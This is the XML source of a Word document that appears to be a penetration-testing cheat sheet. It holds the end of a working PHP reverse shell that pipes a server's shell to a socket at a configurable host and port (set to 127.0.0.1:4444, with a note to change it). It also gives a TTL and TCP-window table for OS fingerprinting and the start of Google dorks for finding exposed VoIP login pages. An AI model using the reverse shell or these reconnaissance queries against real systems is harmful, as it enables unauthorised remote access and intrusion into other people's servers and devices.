        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> === false) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAA696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echo "STRM_ERROR: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>stream_select</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>() failed\n"; break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9B256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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>num_changed_streams</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F5EF9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($this-&gt;os === 'LINUX') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF4C57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in_array</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>($socket  , $streams['read'])) { $this-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>rw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>($socket  , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7548A27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in_array</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>($pipes[2], $streams['read'])) { $this-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>rw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>($pipes[2], $socket  , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8CFA6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in_array</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>($pipes[1], $streams['read'])) { $this-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>rw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>($pipes[1], $socket  , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016F3F8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else if ($this-&gt;os === 'WINDOWS') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E4C62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order is important</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A91C0A6"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in_array</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>($socket, $streams['read'])/*------*/) { $this-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>rw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> ($socket  , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64986B6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 xml:space="preserve"> =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($pipes[2])) &amp;&amp;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['size']) { $this-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>brw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>($pipes[2], $socket  , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465DD88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if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 xml:space="preserve"> =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($pipes[1])) &amp;&amp; $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>fstat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>['size']) { $this-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>brw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>($pipes[1], $socket  , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19487D6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0CFE868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B7C64F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while (!$this-&gt;error);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E39B20B"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WORK END ------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56701BD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E8409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foreach ($pipes as $pipe) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A030A5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fclose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>($pipe);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B0A6DD"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30FE3E68"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proc_close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>($process);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24ACF89F"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1ACAA14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SHELL END ------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A99555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6BC7D2"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roofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>fclose</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>($socket);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDD754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6E8917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 ------ SOCKET END ------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53213AF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DF697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61DD2D34"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xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1C083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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37742E80"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echo '&lt;pre&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F28BC8A"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change the host address and/or port number as necessary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D5E461" w14:textId="636AAAF4"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$sh = new Shell('</w:t>
      </w:r>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">', </w:t>
      </w:r>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>4444</w:t>
      </w:r>
      <w:r w:rsidRPr="00311DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A74CF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$sh-&gt;run();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D40262C"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unset($sh);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310557A7"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garbage collector requires PHP v5.3.0 or greater</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35006A33"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 @gc_collect_cycles();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF6F9C5" w14:textId="77777777" w:rsidR="00311DC9" w:rsidRPr="00311DC9" w:rsidRDefault="00311DC9" w:rsidP="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echo '&lt;/pre&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AAE5A6" w14:textId="39E8B7C3" w:rsidR="00CF1724" w:rsidRPr="003F5A14" w:rsidRDefault="00311DC9" w:rsidP="003F5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11DC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00CF1724">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E6D378" w14:textId="7B623024" w:rsidR="003F5A14" w:rsidRDefault="003F5A14" w:rsidP="003F5A14">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Scripts and Information: </w:t>
      </w:r>
      <w:r w:rsidRPr="003F5A14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OS Fingerprinting with TTL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB3CD78" w14:textId="7BC9AC60" w:rsidR="00CF1724" w:rsidRPr="00CF1724" w:rsidRDefault="00CF1724" w:rsidP="00CF1724">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF1724">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Operating System (OS) </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF1724">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CF1724">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CF1724">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CF1724">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CF1724">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Time To Live</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF1724">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF1724">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CF1724">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CF1724">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CF1724">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>TCP Window Size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DE637D" w14:textId="3D646C89" w:rsidR="00CF1724" w:rsidRDefault="00CF1724" w:rsidP="00CF1724">
      <w:r>
        <w:t xml:space="preserve">Linux (Kernel 2.4 and 2.6) </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">64 </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>5840</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169B85A9" w14:textId="50A4875B" w:rsidR="00CF1724" w:rsidRDefault="00CF1724" w:rsidP="00CF1724">
      <w:r>
        <w:t xml:space="preserve">Google Linux </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">64 </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>5720</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6763504D" w14:textId="26E4CF37" w:rsidR="00CF1724" w:rsidRDefault="00CF1724" w:rsidP="00CF1724">
      <w:r>
        <w:t xml:space="preserve">FreeBSD </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>64</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>65535</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680C84BE" w14:textId="32EE3E9B" w:rsidR="00CF1724" w:rsidRDefault="00CF1724" w:rsidP="00CF1724">
      <w:r>
        <w:t xml:space="preserve">OpenBSD </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">64 </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>16384</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434D6702" w14:textId="78E4A10A" w:rsidR="00CF1724" w:rsidRDefault="00CF1724" w:rsidP="00CF1724">
      <w:r>
        <w:t xml:space="preserve">Windows 95 </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">32 </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>8192</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B75867B" w14:textId="7602E993" w:rsidR="00CF1724" w:rsidRDefault="00CF1724" w:rsidP="00CF1724">
      <w:r>
        <w:t xml:space="preserve">Windows 2000 </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">128 </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>16384</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B4CC7D" w14:textId="68C7B0CC" w:rsidR="00CF1724" w:rsidRDefault="00CF1724" w:rsidP="00CF1724">
      <w:r>
        <w:t xml:space="preserve">Windows XP </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">128 </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>65535</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5115ACE7" w14:textId="025A2B42" w:rsidR="00CF1724" w:rsidRDefault="00CF1724" w:rsidP="00CF1724">
      <w:r>
        <w:t xml:space="preserve">Windows 98, Vista and 7 (Server 2008) </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">128 </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>8192</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583A23CB" w14:textId="0325369A" w:rsidR="008214BB" w:rsidRDefault="008214BB" w:rsidP="00CF1724">
      <w:r>
        <w:t>Windows 10</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4796FD6C" w14:textId="73188B51" w:rsidR="00CF1724" w:rsidRDefault="00CF1724" w:rsidP="00CF1724">
      <w:r>
        <w:t xml:space="preserve">iOS 12.4 (Cisco Routers) </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">255 </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>4128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0684FA78" w14:textId="0FA5A7E0" w:rsidR="00CF1724" w:rsidRDefault="00CF1724" w:rsidP="00CF1724">
      <w:r>
        <w:t xml:space="preserve">Solaris 7 </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">255 </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>8760</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718FFA5B" w14:textId="0A54EE81" w:rsidR="00CF1724" w:rsidRDefault="00CF1724" w:rsidP="00CF1724">
      <w:r>
        <w:t xml:space="preserve">AIX 4.3 </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">64 </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>16384</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774E88D3" w14:textId="1AE40F2D" w:rsidR="00CF1724" w:rsidRDefault="00CF1724">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0110F5" w14:textId="285F90F8" w:rsidR="003F5A14" w:rsidRDefault="003F5A14" w:rsidP="003F5A14">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Scripts and Information: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Google Search Queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABE43EE" w14:textId="79071016" w:rsidR="006B144B" w:rsidRPr="006B144B" w:rsidRDefault="006B144B" w:rsidP="00CF1724">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B144B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Google search queries for VoIP footprinting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B8B8F3" w14:textId="77777777" w:rsidR="007F6E71" w:rsidRDefault="006B144B" w:rsidP="007F6E71">
      <w:r w:rsidRPr="006B144B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Google Dork</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006B144B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r w:rsidRPr="006B144B">
        <w:cr/>
        <w:t>intitle:"Login Page" intext:"Phone</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006B144B">
        <w:t>Adapter Configuration Utility"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
